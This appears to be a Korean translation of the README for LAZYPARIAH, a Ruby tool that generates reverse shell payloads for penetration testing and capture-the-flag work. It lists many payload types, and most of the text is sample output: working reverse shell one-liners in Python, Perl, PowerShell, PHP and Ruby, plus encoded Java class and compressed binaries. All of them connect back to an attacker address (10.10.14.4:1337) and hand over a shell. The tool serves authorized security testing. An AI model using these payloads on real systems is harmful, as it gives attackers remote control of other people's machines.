
즉석에서 리버스 셸 페이로드를 생성하는 도구.
의존성이 낮은 명령줄 도구로, 역방향 셸 페이로드를 즉석에서 생성합니다.
LAZYPARIAH는 순수 Ruby로 작성된 간단하고 쉽게 설치할 수 있는 명령줄 도구로, 침투 테스트 및 캡처 더 플래그(CTF) 대회 중에 다양한 역방향 셸 페이로드를 즉석에서 생성하는 데 사용할 수 있습니다.
LAZYPARIAH가 지원하는 역방향 셸 페이로드는 다음과 같습니다(이에 국한되지 않음):
c_binaryruby, ruby_b64, ruby_hex, ruby_cpowershell_c, powershell_b64python_b64rust_binarysystem() 함수를 통해 호출되는 base64 인코딩된 Python 페이로드를 포함하는 PHP 스크립트: php_system_python_b64java_classperl, perl_b64, perl_hex, perl_cphp_fd, php_fd_c, php_fd_tags이 도구는 자격을 갖춘 침투 테스터, 보안 연구원 및 레드 팀 전문가가 승인된 상황에서만 사용하도록 고안되었습니다. 이 도구를 다운로드, 설치 또는 사용하기 전에 해당 관할권의 관련 법률을 이해하고 있는지 확인하십시오. 이 도구의 저자는 이 도구를 불법 또는 승인되지 않은 목적으로 사용하는 것을 지지, 장려 또는 용납하지 않습니다.
java_class 페이로드에만 필요합니다.)c_binary 페이로드에만 필요합니다.)rust_binary 페이로드에만 필요합니다.)LAZYPARIAH는 RubyGems 설치 프로그램을 사용하여 대부분의 GNU/Linux 및 BSD 시스템에 설치할 수 있습니다:
gem install lazypariah
사용법: lazypariah [옵션] <페이로드 유형> <공격자 호스트> <공격자 포트>
참고: <공격자 호스트>는 IPv4 주소, IPv6 주소 또는 호스트 이름일 수 있습니다.
예시: lazypariah -u python_b64 10.10.14.4 1555
예시: lazypariah python_c malicious.local 1337
유효한 페이로드:
awk
bash_tcp
c_binary
java_class
nc
nc_openbsd
nc_pipe
nodejs
nodejs_b64
nodejs_c
nodejs_hex
perl
perl_b64
perl_c
perl_hex
php_fd
php_fd_c
php_fd_tags
php_system_python_b64
php_system_python_hex
php_system_python_ipv6_b64
php_system_python_ipv6_hex
powershell_b64
powershell_c
python
python_b64
python_c
python_hex
python_ipv6
python_ipv6_b64
python_ipv6_c
python_ipv6_hex
ruby
ruby_b64
ruby_c
ruby_hex
rust_binary
socat
유효한 옵션:
-h, --help 도움말 텍스트를 표시하고 종료합니다.
-l, --license 라이선스 정보를 표시하고 종료합니다.
-u, --url 페이로드를 URL 인코딩합니다.
-v, --version 버전 정보를 표시하고 종료합니다.
-D, --fd 정수 대상이 TCP에 사용하는 파일 디스크립터를 지정합니다. 특정 페이로드에 필요합니다.
-P, --pv 정수 페이로드의 Python 버전을 지정합니다. 2 또는 3이어야 합니다. 기본적으로 버전이 지정되지 않습니다.
-N, --no-new-line 페이로드 끝에 개행 문자를 추가하지 않습니다.
--b64 c_binary, rust_binary 또는 java_class 페이로드를 base-64로 인코딩합니다.
--hex c_binary, rust_binary 또는 java_class 페이로드를 16진수로 인코딩합니다.
--gzip c_binary, rust_binary 또는 java_class 페이로드를 zlib으로 압축합니다.
--gzip_b64 c_binary, rust_binary 또는 java_class 페이로드를 zlib으로 압축하고 결과를 base-64로 인코딩합니다.
--gzip_hex c_binary, rust_binary 또는 java_class 페이로드를 zlib으로 압축하고 결과를 16진수로 인코딩합니다.
위에 나열된 페이로드는 대체로 체계적으로 명명되었습니다.
_c로 끝나는 페이로드는 셸 세션 내에서 실행되도록 설계되었습니다. 이 페이로드는 관련 인터프리터(예: python3 -c 또는 ruby -e)를 사용하여 직접 코드를 실행합니다.
예를 들어, lazypariah python_c 10.10.14.4 1337 명령은 다음 출력을 생성해야 합니다:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
반면에 lazypariah python 10.10.14.4 1337 명령은 잠재적으로 .py 파일에 배치될 수 있는 Python 코드 블록을 생성해야 합니다:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
일반적으로 _b64로 끝나는 페이로드를 선택하면 _c로 끝나는 페이로드와 유사하게 셸 세션 내에서 실행되도록 설계된 명령이 생성되지만 명령 구조가 다릅니다. 이러한 명령은 기본적으로 base64 인코딩된 코드 블록을 base64 -d로 파이프한 다음 관련 인터프리터(예: python3, python2 또는 ruby)로 전달합니다.
예를 들어, lazypariah python_b64 10.10.14.4 1337 명령은 다음 출력을 생성해야 합니다:
echo aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjQiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw== | base64 -d | python
예외는 Powershell의 내장 base64 디코더를 사용하는 powershell_b64입니다. 예를 들어, lazypariah powershell_b64 10.10.14.4 1337 명령은 다음을 반환해야 합니다:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAnACwAMQAzADMANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
(참고: 위 페이로드의 길이는 Powershell이 UTF-16LE 인코딩을 사용하여 단일 문자가 2바이트에 해당하기 때문입니다.)
이러한 유형의 페이로드는 작은따옴표나 큰따옴표를 포함하지 않기 때문에 특정 상황에서 유용할 수 있습니다.
유사하게, _hex로 끝나는 페이로드를 선택하면 16진수 인코딩된 코드 블록을 xxd -p -r -로 파이프한 다음 관련 인터프리터로 전달하는 명령이 생성됩니다. 예를 들어, lazypariah perl_hex 10.10.14.4 1337은 다음 출력을 생성해야 합니다:
echo 75736520536f636b65743b24693d2231302e31302e31342e34223b24703d313333373b736f636b657428532c50465f494e45542c534f434b5f53545245414d2c67657470726f746f62796e616d6528227463702229293b696628636f6e6e65637428532c736f636b616464725f696e2824702c696e65745f61746f6e282469292929297b6f70656e28535444494e2c223e265322293b6f70656e285354444f55542c223e265322293b6f70656e285354444552522c223e265322293b6578656328222f62696e2f7368202d6922293b7d3b | xxd -p -r - | perl
컴파일된 페이로드(c_binary, java_class 및 rust_binary)에는 zlib 압축(--gzip), base64 인코딩(--b64) 및 16진수 인코딩(--hex)을 위한 선택적 명령줄 인수가 있습니다.
예를 들어, lazypariah --b64 java_class 10.10.14.4 1337 명령은 다음 출력을 생성해야 합니다:
yv66vgAAADcAXwoAHQApBwAqBwArCAAsCgACAC0KAAIALgoAAgAvBwAwCAAxCgAIADIKACMAMwoAIwA0CgAIADMKACMANQoACAA1CgAIADYKACQANwoAJAA4CgAlADkKACUAOgUAAAAAAAAAMgoAOwA8CgAjAD0HAD4KACMAPwoACABABwBBBwBCAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEADVN0YWNrTWFwVGFibGUHAEMHAEQHAEUBAApFeGNlcHRpb25zAQAKU291cmNlRmlsZQEAB3JzLmphdmEMAB4AHwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAcvYmluL3NoDAAeAEYMAEcASAwASQBKAQAPamF2YS9uZXQvU29ja2V0AQAKMTAuMTAuMTQuNAwAHgBLDABMAE0MAE4ATQwATwBQDABRAFIMAFMAVAwAVQBUDABWAFcMAFgAHwcAWQwAWgBbDABcAFQBABNqYXZhL2xhbmcvRXhjZXB0aW9uDABdAB8MAF4AHwEAAnJzAQAQamF2YS9sYW5nL09iamVjdAEAEWphdmEvbGFuZy9Qcm9jZXNzAQATamF2YS9pby9JbnB1dFN0cmVhbQEAFGphdmEvaW8vT3V0cHV0U3RyZWFtAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQAWKExqYXZhL2xhbmcvU3RyaW5nO0kpVgEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBAA5nZXRFcnJvclN0cmVhbQEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGlzQ2xvc2VkAQADKClaAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABXdyaXRlAQAEKEkpVgEABWZsdXNoAQAQamF2YS9sYW5nL1RocmVhZAEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEAB2Rlc3Ryb3kBAAVjbG9zZQAhABwAHQAAAAAAAQABAB4AHwACACAAAAEAAAYACQAAALAqtwABuwACWQS9AANZAxIEU7cABQS2AAa2AAdMuwAIWRIJEQU5twAKTSu2AAtOK7YADDoELLYADToFK7YADjoGLLYADzoHLLYAEJoAXS22ABGeAA8ZBy22ABK2ABOn//AZBLYAEZ4AEBkHGQS2ABK2ABOn/+4ZBbYAEZ4AEBkGGQW2ABK2ABOn/+4ZB7YAFBkGtgAUFAAVuAAXK7YAGFenAAg6CKf/oiu2ABostgAbsQABAJoAnwCiABkAAgAhAAAABgABAAAAAQAiAAAAKgAH/wBGAAgHABwHACMHAAgHACQHACQHACQHACUHACUAAAYSFBRXBwAZBAAmAAAABAABABkAAQAnAAAAAgAo
또한 --gzip_b64 및 --gzip_hex 명령줄 인수를 사용하여 앞서 언급한 컴파일된 페이로드 중 하나에 대해 base64 또는 16진수로 인코딩하기 전에 zlib 압축을 수행할 수 있습니다. 예를 들어, lazypariah --gzip_hex java_class 10.10.14.4 1337 명령은 다음 출력을 생성해야 합니다:
1f8b08003ca25960000375535d57125114dd83335ca0511431a53433b5f00bb42c13cc4ad3c2f0a3200dcd5a03dc741419d7cc50f6577ca8b57cf1b55eb095ab7e403fa6d52fc8ce0549c91aee6cced9779f7bce9939f3fdd7976f0046f0ca8336f430f432f4b9d0ef810303024202c20c832e0c79e0c2750f3a7143c0b0704bd64d6195e096075d181170db836e8c0a8828285f141ac59808b8c3302efeef8a987b0cf719262438c7f4bc6e8f4ba809f62c4a90278d2c97e08deb793e57d84a7333a9a573c4d4266c2db339ab6d977c864986070c53123c533b19be6deb46de22276114cc0c9fd6450833add086f646537109ed125a841dce69f9b5f0826964b8654d14f45c969b12ea4fb612b6a9e7d728389cd6f3616b5d044fab7888472a6298a1d24ada3cb7c30923b3c96d4a3a3418126b38342cd48f55c431ab624ec03c16543cc153150924553c13b0882515cfd1ce9052b18c15152f9094d07852c49f9654aca25dc54b51bfc3b4aa2a9d4f6ff00ca56f38d357e52cdd08c7f2db059b7ae2da96047f859d2fd8a7e8f3c195f8df0f202a5e46a3c9b3ba4949a64cd3302bf2b6e0724ffc7fcf322a41b16ccda4ba9a82ff904545bab3d962225ddd1ab7abea6dae9c50dd48b42cad2aca4b4475572da7824fef50b44bb7267386c5b3a5a95b96e0269d9e2b0f1a31319a4392d2b6f2d6d46d22e560a942e575ae60ad57bd85e4fab1d2ca71be2d943342e9e63bbabda8e50a620eb3dcb24de31d8932222d3ad04adf9db824fad170d2d776593870c24decc7de03488770a4e4afa849d5f8e4c40114b90867112c7e0857cae76e50460fe099ed2be2dc1c811a91fb8ba88d2864d7459c647b238cb07e17ab034534bc8737c0c8f015d1b87ff4332097b8fa00135699fc11508e49a7b02a242bc21fa0c47e3f9a3ea399ce6f59da872be2da3fda23e70225b9f8894adfc507ec21409d7440f42195babb42d80b768469b8185a193a9930ba2aab9b16a97d7eff124340c655d2cb1417a0fb1ad90e047f03b0d0dc15ad040000
일부 페이로드는 사용자가 대상이 TCP 연결에 사용하는 파일 디스크립터를 지정하도록 요구합니다. 이러한 페이로드의 한 예는 php_fd_tags로, 특정 파일 디스크립터를 대상으로 하는 PHP 태그(<?php 및 ?>)로 둘러싸인 간단한 PHP 페이로드입니다.
대상 파일 디스크립터를 지정하려면 사용자는 명령줄 인수 -D 정수 또는 --fd 정수를 사용해야 합니다. 예를 들어, 파일 디스크립터 5를 대상으로 하는 php_fd_tags 페이로드를 생성하려면 다음 명령을 사용할 수 있습니다:
lazypariah -D 5 php_fd_tags 10.10.14.4 1337
결과 페이로드는 다음과 같아야 합니다:
<?php $sock=fsockopen("10.10.14.4",1337);exec("/bin/sh -i <&5 >&5 2>&5");?>
다음은 명령의 몇 가지 예와 각각의 출력입니다.
lazypariah -P 3 -u python_b64 10.10.14.4 1337 명령의 출력:
echo%20aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjQiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw%3D%3D%20%7C%20base64%20-d%20%7C%20python3
lazypariah -P 2 python_c 10.10.14.4 1337 명령의 출력:
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
lazypariah -D 3 php_fd_tags 10.10.14.4 1337 명령의 출력:
<?php $sock=fsockopen("10.10.14.4",1337);exec("/bin/sh -i <&3 >&3 2>&3");?>
lazypariah ruby 10.10.14.4 1337 명령의 출력:
require "socket";exit if fork;c=TCPSocket.new("10.10.14.4","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end
Copyright (C) 2020-2022 Peter Bruce Funnell
이 프로그램은 자유 소프트웨어입니다. Free Software Foundation에서 발표한 GNU General Public License의 버전 3 또는 (선택에 따라) 그 이후 버전의 조건에 따라 재배포 및/또는 수정할 수 있습니다.
이 프로그램은 유용하기를 바라며 배포되지만, 어떤 경우에도 명시적 또는 묵시적 보증 없이 제공됩니다. 상품성 또는 특정 목적에의 적합성에 대한 묵시적 보증도 포함되지 않습니다. 자세한 내용은 GNU General Public License를 참조하십시오.
이 프로그램과 함께 GNU General Public License의 사본을 받았을 것입니다. 받지 못했다면 https://www.gnu.org/licenses/를 참조하십시오.